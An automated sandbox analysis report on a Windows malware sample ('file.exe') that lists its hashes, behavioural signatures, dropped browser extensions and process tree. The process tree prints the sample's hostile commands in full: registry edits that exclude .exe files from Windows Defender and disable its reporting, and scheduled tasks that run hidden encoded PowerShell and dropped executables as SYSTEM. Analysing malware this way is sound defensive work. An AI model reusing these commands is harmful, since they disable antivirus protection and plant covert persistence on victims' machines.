Analysis
-
max time kernel
120s -
max time network
154s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
26-09-2022 03:03
Static task
static1
Behavioral task
behavioral1
Sample
file.exe
Resource
win7-20220812-en
General
-
Target
file.exe
-
Size
7.2MB
-
MD5
20704fc92ed49100e2963e7690e4cc95
-
SHA1
d9d9c124c95fbc4749ef8ab8b2eb8c7acd329cdf
-
SHA256
a07f93b63123cdf3cbcb146daf61069b7137e1a297346fb2f4c5fdcd30d4acaf
-
SHA512
a0b2e238542707df3aaa6e379eb75ed318fd0fa5c8aca67e89325973c9e991b5da44d098cfca71cf0f27262dffcdd28eb0c0c90d34be58d91e761a959358f230
-
SSDEEP
196608:91OC2MisUkla+i6k9OP8EeQDPesNZZY9X:3Or1Hkla+MOEJsnCB
Malware Config
Signatures
-
Blocklisted process makes network request 3 IoCs
Processes:
rundll32.exeflow pid process 64 1576 rundll32.exe 65 1576 rundll32.exe 67 1576 rundll32.exe -
Executes dropped EXE 4 IoCs
Processes:
Install.exeInstall.execjUBQYS.exetawQnMM.exepid process 4380 Install.exe 4840 Install.exe 3256 cjUBQYS.exe 740 tawQnMM.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
Install.exerundll32.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
Install.exetawQnMM.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation Install.exe Key value queried \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation tawQnMM.exe -
Loads dropped DLL 1 IoCs
Processes:
rundll32.exepid process 1576 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 3 IoCs
Processes:
tawQnMM.exedescription ioc process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json tawQnMM.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\meejmcfbiapijdfaadackoblffmidlig\1.0.0.0\manifest.json tawQnMM.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\goiejopegncpjmocklmfiipofdbkhpic\1.0.0.0\manifest.json tawQnMM.exe -
Drops desktop.ini file(s) 1 IoCs
Processes:
tawQnMM.exedescription ioc process File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini tawQnMM.exe -
Drops file in System32 directory 31 IoCs
Processes:
tawQnMM.exepowershell.execjUBQYS.exepowershell.exeInstall.exedescription ioc process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE tawQnMM.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA tawQnMM.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 tawQnMM.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_58589533BD741CABD9C6A1C2A7AAD4A1 tawQnMM.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F2DDCD2B5F37625B82E81F4976CEE400_D29849B2B3CC9118078AA61A670027D9 tawQnMM.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol tawQnMM.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A16C6C16D94F76E0808C087DFC657D99_57084D1D86D9F07AD164FDFDC2CB1CB3 tawQnMM.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 tawQnMM.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft tawQnMM.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA tawQnMM.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content tawQnMM.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\48F3BB146086CEF37D471FBE460215C9 tawQnMM.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol cjUBQYS.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini cjUBQYS.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies tawQnMM.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache tawQnMM.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04 tawQnMM.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04 tawQnMM.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData tawQnMM.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A16C6C16D94F76E0808C087DFC657D99_57084D1D86D9F07AD164FDFDC2CB1CB3 tawQnMM.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA tawQnMM.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_58589533BD741CABD9C6A1C2A7AAD4A1 tawQnMM.exe File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 tawQnMM.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\48F3BB146086CEF37D471FBE460215C9 tawQnMM.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 tawQnMM.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA tawQnMM.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2DDCD2B5F37625B82E81F4976CEE400_D29849B2B3CC9118078AA61A670027D9 tawQnMM.exe -
Drops file in Program Files directory 14 IoCs
Processes:
tawQnMM.exedescription ioc process File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja tawQnMM.exe File created C:\Program Files (x86)\jFRyDUODU\YOItBGr.xml tawQnMM.exe File created C:\Program Files (x86)\oCfcnVibUgRU2\ioQojJk.xml tawQnMM.exe File created C:\Program Files (x86)\jWYIfSfaEDaYgVKkjRR\qkmUJcE.xml tawQnMM.exe File created C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi tawQnMM.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak tawQnMM.exe File created C:\Program Files (x86)\oCfcnVibUgRU2\hPPHdEkrAXiKi.dll tawQnMM.exe File created C:\Program Files (x86)\SfrSbxhXbhVCC\PtmRoJF.dll tawQnMM.exe File created C:\Program Files (x86)\dWSjIMqfbdUn\WgVWOaY.dll tawQnMM.exe File created C:\Program Files (x86)\jFRyDUODU\PHErXK.dll tawQnMM.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi tawQnMM.exe File created C:\Program Files (x86)\jWYIfSfaEDaYgVKkjRR\YerEkbo.dll tawQnMM.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak tawQnMM.exe File created C:\Program Files (x86)\SfrSbxhXbhVCC\fkEKoFh.xml tawQnMM.exe -
Drops file in Windows directory 4 IoCs
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exedescription ioc process File created C:\Windows\Tasks\kYTQWNyBMOqWrvtpH.job schtasks.exe File created C:\Windows\Tasks\bNpHvRwEXzIclVjPnA.job schtasks.exe File created C:\Windows\Tasks\ZfXrITCAwqWWdJVle.job schtasks.exe File created C:\Windows\Tasks\bcMXixuPVnLBvIi.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 11 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 3368 schtasks.exe 3244 schtasks.exe 1692 schtasks.exe 2448 schtasks.exe 4240 schtasks.exe 1920 schtasks.exe 4916 schtasks.exe 4000 schtasks.exe 3012 schtasks.exe 4988 schtasks.exe 1448 schtasks.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
Processes:
Install.exerundll32.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.exetawQnMM.exepowershell.exerundll32.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix tawQnMM.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket tawQnMM.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" tawQnMM.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" tawQnMM.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ tawQnMM.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" tawQnMM.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" tawQnMM.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" tawQnMM.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer tawQnMM.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{5d2b4a7c-0000-0000-0000-d01200000000}\MaxCapacity = "15140" tawQnMM.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume tawQnMM.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe -
Suspicious behavior: EnumeratesProcesses 40 IoCs
Processes:
powershell.EXEpowershell.exepowershell.exepowershell.EXEtawQnMM.exepid process 3012 powershell.EXE 3012 powershell.EXE 4908 powershell.exe 4908 powershell.exe 4664 powershell.exe 4664 powershell.exe 2236 powershell.EXE 2236 powershell.EXE 740 tawQnMM.exe 740 tawQnMM.exe 740 tawQnMM.exe 740 tawQnMM.exe 740 tawQnMM.exe 740 tawQnMM.exe 740 tawQnMM.exe 740 tawQnMM.exe 740 tawQnMM.exe 740 tawQnMM.exe 740 tawQnMM.exe 740 tawQnMM.exe 740 tawQnMM.exe 740 tawQnMM.exe 740 tawQnMM.exe 740 tawQnMM.exe 740 tawQnMM.exe 740 tawQnMM.exe 740 tawQnMM.exe 740 tawQnMM.exe 740 tawQnMM.exe 740 tawQnMM.exe 740 tawQnMM.exe 740 tawQnMM.exe 740 tawQnMM.exe 740 tawQnMM.exe 740 tawQnMM.exe 740 tawQnMM.exe 740 tawQnMM.exe 740 tawQnMM.exe 740 tawQnMM.exe 740 tawQnMM.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
powershell.EXEpowershell.exepowershell.exepowershell.EXEdescription pid process Token: SeDebugPrivilege 3012 powershell.EXE Token: SeDebugPrivilege 4908 powershell.exe Token: SeDebugPrivilege 4664 powershell.exe Token: SeDebugPrivilege 2236 powershell.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
file.exeInstall.exeInstall.exeforfiles.exeforfiles.execmd.execmd.exepowershell.EXEcjUBQYS.exepowershell.execmd.exedescription pid process target process PID 1264 wrote to memory of 4380 1264 file.exe Install.exe PID 1264 wrote to memory of 4380 1264 file.exe Install.exe PID 1264 wrote to memory of 4380 1264 file.exe Install.exe PID 4380 wrote to memory of 4840 4380 Install.exe Install.exe PID 4380 wrote to memory of 4840 4380 Install.exe Install.exe PID 4380 wrote to memory of 4840 4380 Install.exe Install.exe PID 4840 wrote to memory of 4784 4840 Install.exe forfiles.exe PID 4840 wrote to memory of 4784 4840 Install.exe forfiles.exe PID 4840 wrote to memory of 4784 4840 Install.exe forfiles.exe PID 4840 wrote to memory of 2188 4840 Install.exe forfiles.exe PID 4840 wrote to memory of 2188 4840 Install.exe forfiles.exe PID 4840 wrote to memory of 2188 4840 Install.exe forfiles.exe PID 4784 wrote to memory of 4060 4784 forfiles.exe cmd.exe PID 4784 wrote to memory of 4060 4784 forfiles.exe cmd.exe PID 4784 wrote to memory of 4060 4784 forfiles.exe cmd.exe PID 2188 wrote to memory of 3580 2188 forfiles.exe cmd.exe PID 2188 wrote to memory of 3580 2188 forfiles.exe cmd.exe PID 2188 wrote to memory of 3580 2188 forfiles.exe cmd.exe PID 4060 wrote to memory of 4224 4060 cmd.exe reg.exe PID 4060 wrote to memory of 4224 4060 cmd.exe reg.exe PID 4060 wrote to memory of 4224 4060 cmd.exe reg.exe PID 4060 wrote to memory of 1820 4060 cmd.exe reg.exe PID 4060 wrote to memory of 1820 4060 cmd.exe reg.exe PID 4060 wrote to memory of 1820 4060 cmd.exe reg.exe PID 3580 wrote to memory of 4560 3580 cmd.exe reg.exe PID 3580 wrote to memory of 4560 3580 cmd.exe reg.exe PID 3580 wrote to memory of 4560 3580 cmd.exe reg.exe PID 3580 wrote to memory of 3536 3580 cmd.exe reg.exe PID 3580 wrote to memory of 3536 3580 cmd.exe reg.exe PID 3580 wrote to memory of 3536 3580 cmd.exe reg.exe PID 4840 wrote to memory of 4240 4840 Install.exe schtasks.exe PID 4840 wrote to memory of 4240 4840 Install.exe schtasks.exe PID 4840 wrote to memory of 4240 4840 Install.exe schtasks.exe PID 4840 wrote to memory of 4640 4840 Install.exe schtasks.exe PID 4840 wrote to memory of 4640 4840 Install.exe schtasks.exe PID 4840 wrote to memory of 4640 4840 Install.exe schtasks.exe PID 3012 wrote to memory of 4828 3012 powershell.EXE gpupdate.exe PID 3012 wrote to memory of 4828 3012 powershell.EXE gpupdate.exe PID 4840 wrote to memory of 1120 4840 Install.exe schtasks.exe PID 4840 wrote to memory of 1120 4840 Install.exe schtasks.exe PID 4840 wrote to memory of 1120 4840 Install.exe schtasks.exe PID 4840 wrote to memory of 1920 4840 Install.exe schtasks.exe PID 4840 wrote to memory of 1920 4840 Install.exe schtasks.exe PID 4840 wrote to memory of 1920 4840 Install.exe schtasks.exe PID 3256 wrote to memory of 4908 3256 cjUBQYS.exe powershell.exe PID 3256 wrote to memory of 4908 3256 cjUBQYS.exe powershell.exe PID 3256 wrote to memory of 4908 3256 cjUBQYS.exe powershell.exe PID 4908 wrote to memory of 4584 4908 powershell.exe cmd.exe PID 4908 wrote to memory of 4584 4908 powershell.exe cmd.exe PID 4908 wrote to memory of 4584 4908 powershell.exe cmd.exe PID 4584 wrote to memory of 5040 4584 cmd.exe reg.exe PID 4584 wrote to memory of 5040 4584 cmd.exe reg.exe PID 4584 wrote to memory of 5040 4584 cmd.exe reg.exe PID 4908 wrote to memory of 4872 4908 powershell.exe reg.exe PID 4908 wrote to memory of 4872 4908 powershell.exe reg.exe PID 4908 wrote to memory of 4872 4908 powershell.exe reg.exe PID 4908 wrote to memory of 4356 4908 powershell.exe reg.exe PID 4908 wrote to memory of 4356 4908 powershell.exe reg.exe PID 4908 wrote to memory of 4356 4908 powershell.exe reg.exe PID 4908 wrote to memory of 3752 4908 powershell.exe reg.exe PID 4908 wrote to memory of 3752 4908 powershell.exe reg.exe PID 4908 wrote to memory of 3752 4908 powershell.exe reg.exe PID 4908 wrote to memory of 1528 4908 powershell.exe reg.exe PID 4908 wrote to memory of 1528 4908 powershell.exe reg.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSD91F.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSDDB3.tmp\Install.exe.\Install.exe /S /site_id "525403"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks computer location settings
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:326⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:646⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:326⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:646⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gQXaASGyz" /SC once /ST 00:55:05 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gQXaASGyz"4⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gQXaASGyz"4⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bNpHvRwEXzIclVjPnA" /SC once /ST 05:04:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\erzvrHvcaZerrtDXV\dMUiSaChFqmKilH\cjUBQYS.exe\" hV /site_id 525403 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵
-
